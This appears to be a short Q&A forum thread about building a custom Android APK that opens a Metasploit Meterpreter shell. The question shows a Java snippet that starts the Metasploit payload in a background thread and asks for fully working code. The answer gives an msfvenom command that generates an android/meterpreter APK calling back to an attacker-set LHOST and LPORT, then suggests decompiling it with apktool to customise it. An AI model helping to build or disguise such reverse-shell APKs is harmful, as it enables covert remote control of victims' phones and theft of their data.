# android: custom metasploit apk

Tags: apk, metasploit

I tried to create a custom android apk to open a meterpreter shell session on metasploit, but it's not working.

It connects to metasploit handler, but I don't have the meterpreter shell.

```
public static void startAsync() {
        new Thread() {
            @Override
            public void run() {
                // Execute the payload
                Payload.main(null);
            }
        }.start();
    }
```

the

> .start()

is not in the code.

Someone have a completely working code?

[Original Code](https://github.com/rapid7/metasploit-javapayload/blob/master/androidpayload/app/src/com/metasploit/stage/Payload.java#L28)

Comment: I'm also working on this.. [Customizing Metasploit Java Payloads for Android APK Deployment](https://blog.ask-a.ninja/?p=39) this helped me, but I'm getting an error..

Answer (score 1):

You can create an app with `msfvenom` to create the base and then decompile it with a program like apktool and make changes to that app

```
msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
```